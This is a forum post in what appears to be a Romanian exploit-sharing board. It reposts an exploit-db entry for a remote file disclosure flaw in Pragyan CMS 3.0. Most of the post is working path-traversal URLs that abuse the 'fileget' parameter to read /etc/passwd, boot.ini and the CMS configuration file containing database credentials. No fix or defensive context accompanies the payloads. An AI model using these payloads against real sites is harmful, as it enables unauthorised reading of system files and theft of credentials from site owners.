Jump to content
The_Arhitect

Pragyan CMS v 3.0 Remote File Disclosure

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted 

Title   
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author  
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln
download.lib.php line 16
vuln
index.php line 234

$_GET['fileget']

exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php

source: exploit-db.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...